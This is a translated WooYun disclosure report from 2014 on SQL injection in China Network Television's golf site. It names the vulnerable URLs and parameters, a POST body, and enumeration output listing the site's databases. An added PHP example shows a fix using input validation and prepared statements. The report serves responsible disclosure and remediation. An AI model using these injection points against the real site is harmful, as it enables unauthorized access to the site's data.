Multiple SQL injection vulnerabilities on a China Network Television (CNTV) site

Vulnerability details

Disclosure status:

2014-03-01: Details reported to the vendor; awaiting vendor action
2014-03-04: Vendor confirmed; details disclosed to the vendor only
2014-03-14: Details disclosed to core white hats and domain experts
2014-03-24: Details disclosed to regular white hats
2014-04-03: Details disclosed to intern white hats
2014-04-15: Details disclosed to the public

Brief description:

SQL injection

Detailed description:

Site:

http://golf.cctv.com/ (CCTV Pan-Golf Network, 央视泛高尔夫网)

Injection points:

http://golf.cctv.com/e/extend/dc_list.php?key=

http://golf.cctv.com/e/extend/court/pl_reply.php?courtid=131&uid=

http://golf.cctv.com/e/extend/court/court_detail.php?courtid=131&hole=1#hole_data

POST injection:

http://golf.cctv.com/e/extend/court/pl_reply.php?courtid=131&uid=
POST body: reply=%E5%8F%91%E8%A1%A8%E5%9B%9E%E5%A4%8D&replytext=88952634

Proof of vulnerability:

Taking http://golf.cctv.com/e/extend/court/pl_reply.php?courtid=131&uid= as an example:

available databases [5]:
[*] fungolf
[*] information_schema
[*] photo_golf
[*] sgagolf
[*] test



fungolf 320个表,uc, uchome开头的是app数据吧

Database: fungolf
[337 tables]

Remediation:

Fix it!
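A hardened handler for the pl_reply.php parameters named in this report, added here as an example; it is not code from golf.cctv.com or from the CMS behind it. The parameter names courtid, uid and replytext come from the report; the table court_reply, its columns, and the connection credentials are assumptions.

```php
<?php
// Added example (not the site's code). The report's symptoms match the
// classic pattern of interpolating request values straight into SQL, e.g.
//   "... WHERE courtid=" . $_GET['courtid'] . " AND uid=" . $_GET['uid']
// (assumed, the real source was not published). The fix below validates
// the integer parameters and binds every value through a prepared statement.
declare(strict_types=1);

function readInt(array $src, string $key): ?int
{
    // Accept only a plain positive integer; arrays, empty strings
    // (as in "uid=") and anything with SQL syntax are rejected.
    if (!isset($src[$key])) {
        return null;
    }
    $v = filter_var($src[$key], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $v === false ? null : $v;
}

function saveReply(PDO $db, int $courtid, int $uid, string $text): bool
{
    // Bound parameters travel separately from the query text, so quotes,
    // comment markers or UNION fragments in $text cannot alter the statement.
    $stmt = $db->prepare(
        'INSERT INTO court_reply (courtid, uid, replytext) VALUES (:courtid, :uid, :text)'
    );
    $stmt->bindValue(':courtid', $courtid, PDO::PARAM_INT);
    $stmt->bindValue(':uid', $uid, PDO::PARAM_INT);
    $stmt->bindValue(':text', mb_substr($text, 0, 1000), PDO::PARAM_STR);
    return $stmt->execute();
}

// Credentials are placeholders; the database name fungolf is from the report.
$db = new PDO('mysql:host=localhost;dbname=fungolf;charset=utf8mb4', 'app_user', '<password>', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepared statements
]);

$courtid = readInt($_GET, 'courtid');
$uid     = readInt($_GET, 'uid');
$text    = isset($_POST['replytext']) ? trim((string) $_POST['replytext']) : '';

if ($courtid === null || $uid === null || $text === '') {
    http_response_code(400);   // malformed input never reaches the database
    exit('bad request');
}
saveReply($db, $courtid, $uid, $text);
```

The same two steps (reject non-integer ids, bind the rest) apply to the dc_list.php key parameter and the court_detail.php courtid parameter listed above.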

Copyright notice: when reposting, please credit the source: HackBraid@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2014-03-04 23:02

Vendor reply:

Thank you very much; we will rectify this service as soon as possible! ~~ Thank you for your support and help! ~~~

Latest status:

None yet


Vulnerability rating: